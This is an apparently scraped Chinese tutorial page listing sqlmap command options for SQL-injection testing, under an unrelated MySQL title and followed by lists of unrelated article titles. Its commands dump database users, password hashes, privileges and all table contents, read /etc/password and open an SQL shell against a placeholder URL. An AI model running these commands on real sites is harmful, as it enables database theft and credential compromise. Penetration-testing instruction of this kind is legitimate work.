mysql中的rm语句用法_SQLMap部分命令用法详解
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,它可以自动的探测和利用SQL注入漏洞来接管数据库等,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。
1)判断当前用户是否是dba
python sqlmap.py -u "url" --is-dba -v 1
2)--users:列出数据库管理系统用户
python sqlmap.py -u "url" --users -v 0
3)--passwords:数据库用户密码(hash)
python sqlmap.py -u "url" --passwords -v 0
python sqlmap.py -u "url" --passwords -U sa -v 0
4)查看用户权限
python sqlmap.py -u "url" --privileges -v 0
python sqlmap.py -u "url" --privileges -U postgres -v 0
5)--dbs可以利用的数据库
python sqlmap.py -u "url" --dbs -v 0
6)--tables列数据库表
python sqlmap.py -u "url" --tables -D "information_scheam"
-D:指定数据名称
7)--columns 列出表中的列名
python sqlmap.py -u "url" --columns -T "user" -D "mysql" -v 1
-T:指定表名,-D:指定库名
8)--dump列表中指定列的内容
python sqlmap.py -u "url" --dump -T "users" -D "testdb"
-C:可以指定字段
指定列的范围为2到4
python sqlmap.py -u "url" --dump -T "users" -D "testdb" --start 2 --stop 4 -v 0
9)--dumap-all列出所有数据库,所有表内容
python sqlmap.py -u "url" --dump-all -v 0
只列出用户自己新建的数据库和表的内容
python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0
10)--file读取文件内容[load_file()函数]
python sqlmap.py -u "url" --file /etc/password
11)执行SQL
python sqlmap.py -u "url" --sql-shell
12)-p 指定参数
python sqlmap.py -u "url" -v 1 -p "id"
-p可以指定多参数-p "cat,id"
13)POST提交
python sqlmap.py -u "url" --method POST --data "id=1"
14)COOKIE提交
python sqlmap.py -u "url" --cookie "id=1" -v 1
mysql中的rm语句用法_SQLMap部分命令用法详解相关推荐
- mysql中设置字符集语句_MYSQL字符集设置的方法详解(终端的字符集)
前言 每次利用终端 创建数据库或者创建表的时候,字符集都是latin1,或者进行插入值的时候,显示的是乱码(不指定字符集的时候)如下: 查看当前数据库的字符集 character_set_client ...
- linux命令wget的url路径太长,Linux中WGET下载https链接及WGET命令的详解
Linux中WGET下载https链接及WGET命令的详解 使用如下的命令下载https链接: ```bash wget -r -np -nd --accept=gz --no-check-certi ...
- alter在MySQL中是什么意思_MySql之ALTER命令用法详细解读(转)
本文详细解读了MySql语法中Alter命令的用法,这是一个用法比较多的语法,而且功能还是很强大的. USE learning;(自己要提前建好) CREATE TABLE student(id IN ...
- mysql中修改表字段名/字段长度/字段类型详解
在mysql中我们对数据表字段的修改命令只要使用alter就可以了,下面我来给大家详细介绍mysql中修改表字段名/字段长度/字段类型等等一些方法介绍,有需要了解的朋友可参考. 先来看看常用的方法 M ...
- mysql中锁原理及for update悲观锁的详解
mysql 中有多种多样的锁,今天我们具体分享一下: 一.mysql中乐观锁和悲观锁原理及种类: 乐观锁并不是数据库自带的,如果需要使用乐观锁,那么需要自己去实现,一般情况下,我们会 ...
- mysql中flush tables和flush tables with read lock详解
官方手册中关于Flush tables的介绍, Closes all open tables, forces all tables in use to be closed, and flushes t ...
- hadoop中的jps是什么,Jps命令—使用详解【笔记自用】
jps是jdk提供的一个查看当前java进程的小工具, 可以看做是JavaVirtual Machine Process Status Tool的缩写.非常简单实用. 命令格式:jps [option ...
- mysql中利用sql语句修改字段名称,字段长度等操作(亲测)
在网站重构中,通常会进行数据结构的修改,所以添加,删除,增加mysql表的字段是难免的,有时为了方便,还会增加修改表或字段的注释,把同字段属性调整到一块儿.这些操作可以在phpmyadmin或者别的m ...
- mysql的join语句使用_在MySQL中使用JOIN语句进行连接操作的详细教程
到目前,我们已经学习了从一个表中获取数据.这是简单的需要,但在大多数现实MySQL的使用,经常需要将数据从多个表中的一个单一的查询. 可以使用多个表中的单一SQL查询.在MySQL中联接(join)行 ...
- PHP中for循环设计无穷循环,PHP中for循环语句的几种“变态”用法
PHP中for循环语句的几种"变态"用法 for语句可以说是PHP(同时也是多种语言)的循环控制部份最基本的一个语句了,for语句的执行规律和基础用法在这里就不多说,可以参见PHP ...
最新文章
- 统计数列中是连续数的个数
- ASP.NET MVC4+BootStrap实战
- DayDayUp:今天早上看到一条朋友圈——《吃苦与穷的深刻认知》
- spring 的IoC的个人理解
- html5掉落效果,HTML5 菜单掉落动效
- Android的init过程:init.rc解析流程
- matlab聚类算法,科学网—matlab-聚类算法笔记 - 孙月芳的博文
- VS 编写 x64 内联汇编
- Python的包(Packages)
- angular学习资源
- 全国370城市空间权重矩阵及计算方法、城市点坐标、城市道路网、城市poi感兴趣点
- 今日头条推荐算法原理
- python表格绘制斜线表头_【Excel系列05】表格中如何制作斜线表头
- Gentoo Linux安装教程20220218(长期更新维护)
- 硬盘出现坏道的处理方法
- 语音转换成文本 技术实现_职业转换者指南,帮助您实现梦想的技术工作
- 华南师范大学计算机学院学硕,华南师范大学计算机学院研究生导师简介肖菁
- 来自#Devoxx 2014的WebSocket螺母和螺栓的幻灯片
- 持续迭代、永久更新的WIN NFT HORSE,具有无穷无尽的生命力
- Source Insight主题美化插件
热门文章
- CustomValidator控件用法
- 20191208每日一句
- Atitit custom popup 弹窗 techweo layers目录Custom div 1Open 2关闭popup 3关闭事件 3Custom div<!-- pw
- Atitit enhance dev effect提升开发效率的十大原理与方法v2 u66.docx Atitit enhance dev effect提升开发效率的十大原理 目录 1. 管理	2
- Atitit 产品化法通则 目录 1. 何谓软件产品化?	1 2. 产品化优点 vs 项目化	2 2.1. 软件复用率提高	2 2.2. ,项目化交付	2 2.3. 维护成本高	2 3. 产品金字塔
- Atitit 项目管理之时间管理之道 attilax著 艾龙 著 1. 项目活动的分解和定义	1 2. 第2章|项目活动定义与活动排序 13	1 3. 项目活动资源需求估计	2 4. 里程碑节点	2
- Atitit 引流矩阵与矩阵引流 推广方法 attilax总结
- Atitit 建设自己的财政体系 attilax总结 1.1. 收入理论	2 1.2. 收入分类	2 1.3. 	2 1.4. 非货币收入	2 1.5. 	2 1.6. 降低期望	2 1.7.
- Atitit 延迟绑定架构法attilax总结
- Atitit. 二进制数据ascii表示法,与base64编码解码api 设计标准化总结java php c#.net